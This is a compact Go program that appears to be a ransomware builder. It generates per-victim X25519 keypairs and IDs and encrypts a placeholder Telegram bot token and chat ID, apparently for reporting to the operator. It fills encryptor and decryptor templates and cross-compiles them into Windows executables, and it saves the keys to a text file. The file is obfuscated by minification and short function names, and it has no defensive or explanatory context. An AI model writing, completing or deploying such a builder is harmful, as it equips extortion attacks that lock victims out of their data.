package main
import("crypto/aes";"crypto/cipher";"crypto/ecdh";"crypto/rand";"crypto/sha256";"encoding/base64";"fmt";"os";"os/exec";"strings";"text/template")
type KD struct{ID,PublicKeyBytes,PrivateKeyBytes,EncryptedToken,EncryptedChatID string}
func main(){if _,err:=os.Stat("bg.jpeg");os.IsNotExist(err){fmt.Println("ERR: bg.jpeg");os.Exit(1)};pk,err:=ecdh.X25519().GenerateKey(rand.Reader);if err!=nil{panic(err)};ub:=pk.PublicKey();vb:=pk.Bytes();wb:=ub.Bytes();id:=gI();ot:="YOUR_TELEGRAM_BOT_TOKEN";oc:="YOUR_TELEGRAM_CHAT_ID";et,err:=eS(ot,id);if err!=nil{panic(err)};ec,err:=eS(oc,id);if err!=nil{panic(err)};da:=KD{ID:id,PublicKeyBytes:fB(wb),PrivateKeyBytes:fB(vb),EncryptedToken:et,EncryptedChatID:ec};if err:=pT("encryptor_template.go","encryptor_gen.go",da);err!=nil{panic(err)};defer os.Remove("encryptor_gen.go");if err:=pT("decryptor_template.go","decryptor_gen.go",da);err!=nil{panic(err)};defer os.Remove("decryptor_gen.go");en:=fmt.Sprintf("e_%s.exe",id);if err:=bB(en,"encryptor_gen.go");err!=nil{panic(err)};fmt.Printf("E: %s\n",en);de:=fmt.Sprintf("d_%s.exe",id);if err:=bB(de,"decryptor_gen.go");err!=nil{panic(err)};fmt.Printf("D: %s\n",de);kf:=fmt.Sprintf("%s.txt",id);ct:=fmt.Sprintf("ID: %s\nPK: %s\nRK: %s\nPKH: %x\nRKH: %x\n",id,da.PublicKeyBytes,da.PrivateKeyBytes,wb,vb);os.WriteFile(kf,[]byte(ct),0644);fmt.Printf("K: %s\n",kf)}
func gI()string{b:=make([]byte,4);rand.Read(b);r:=(int(b[0])<<24|int(b[1])<<16|int(b[2])<<8|int(b[3]))%100000000;i:=fmt.Sprintf("%08d",r);if len(i)>8{i=i[:8]};return i}
func bB(o,s string)error{c:=exec.Command("go","build","-o",o,s);c.Env=append(os.Environ(),"GOOS=windows","GOARCH=amd64","CGO_ENABLED=0");return c.Run()}
func eS(p,i string)(string,error){k:=sha256.Sum256([]byte(i));b,e:=aes.NewCipher(k[:]);if e!=nil{return"",e};g,e:=cipher.NewGCM(b);if e!=nil{return"",e};n:=make([]byte,g.NonceSize());rand.Read(n);c:=g.Seal(n,n,[]byte(p),nil);return base64.StdEncoding.EncodeToString(c),nil}
func fB(b []byte)string{var s strings.Builder;s.WriteString("{");for i,v:=range b{if i>0{s.WriteString(",")};fmt.Fprintf(&s,"%d",v)};s.WriteString("}");return s.String()}
func pT(t,o string,d KD)error{x,e:=template.ParseFiles(t);if e!=nil{return e};f,e:=os.Create(o);if e!=nil{return e};defer f.Close();return x.Execute(f,d)}
